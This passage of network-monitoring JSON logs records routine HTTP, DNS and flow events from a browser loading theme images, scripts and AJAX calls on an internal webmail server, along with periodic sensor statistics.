Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":4}} 
{"timestamp":"2020-02-29T00:27:05.075180+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:27:05.075225+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.075684+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":5}} {"timestamp":"2020-02-29T00:27:05.080128+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:27:05.080803+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:27:05.081294+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":6}} {"timestamp":"2020-02-29T00:27:05.082259+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":14}} {"timestamp":"2020-02-29T00:27:05.082704+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} 
{"timestamp":"2020-02-29T00:27:05.081787+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:27:05.082241+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.084761+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} 
{"timestamp":"2020-02-29T00:27:05.085232+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":8}} {"timestamp":"2020-02-29T00:27:05.086063+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:27:05.086632+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":9}} {"timestamp":"2020-02-29T00:27:05.087326+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} {"timestamp":"2020-02-29T00:27:05.117258+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} 
{"timestamp":"2020-02-29T00:27:05.129323+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:05.129537+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} 
{"timestamp":"2020-02-29T00:27:09.000200+0000","event_type":"stats","stats":{"uptime":15281,"capture":{"kernel_packets":142477,"kernel_drops":0},"decoder":{"pkts":142501,"bytes":97889223,"invalid":196,"ipv4":140902,"ipv6":10,"ethernet":142501,"raw":0,"null":0,"sll":0,"tcp":135303,"udp":5388,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2925,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2941,"synack":2932,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1928,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2465,"failed_udp":116},"tx":{"http":5062,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2549}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":191168,"memcap":0}}} 
{"timestamp":"2020-02-29T00:27:09.589567+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53172,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:27:09.593077+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53174,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:27:10.080478+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":8}} {"timestamp":"2020-02-29T00:27:10.090833+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":16}} {"timestamp":"2020-02-29T00:27:10.090862+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":10}} 
{"timestamp":"2020-02-29T00:27:11.000463+0000","flow_id":2027510962510488,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:10.449176+0000","end":"2020-02-29T00:22:10.558947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:11.000760+0000","flow_id":643767004159899,"event_type":"flow","src_ip":"192.168.10.130","src_port":34304,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":61,"bytes_toserver":3771,"bytes_toclient":80639,"start":"2020-02-29T00:26:01.384923+0000","end":"2020-02-29T00:26:06.438507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:11.724590+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:27:11.749561+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36399,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:27:11.774787+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":0}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} 
{"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:16.000175+0000","event_type":"stats","stats":{"uptime":15288,"capture":{"kernel_packets":142521,"kernel_drops":0},"decoder":{"pkts":142534,"bytes":97894139,"invalid":196,"ipv4":140933,"ipv6":10,"ethernet":142534,"raw":0,"null":0,"sll":0,"tcp":135332,"udp":5390,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2926,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2942,"synack":2933,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1929,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2466,"failed_udp"
:116},"tx":{"http":5064,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2550}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10890,"memcap_state":0,"memcap_global":0},"http":{"memuse":40157,"memcap":0}}} {"timestamp":"2020-02-29T00:27:16.947002+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.456753+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} 
{"timestamp":"2020-02-29T00:27:19.458133+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:27:19.462861+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464307+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","state":"CLOSED","stored":false,"size":138,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464428+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} 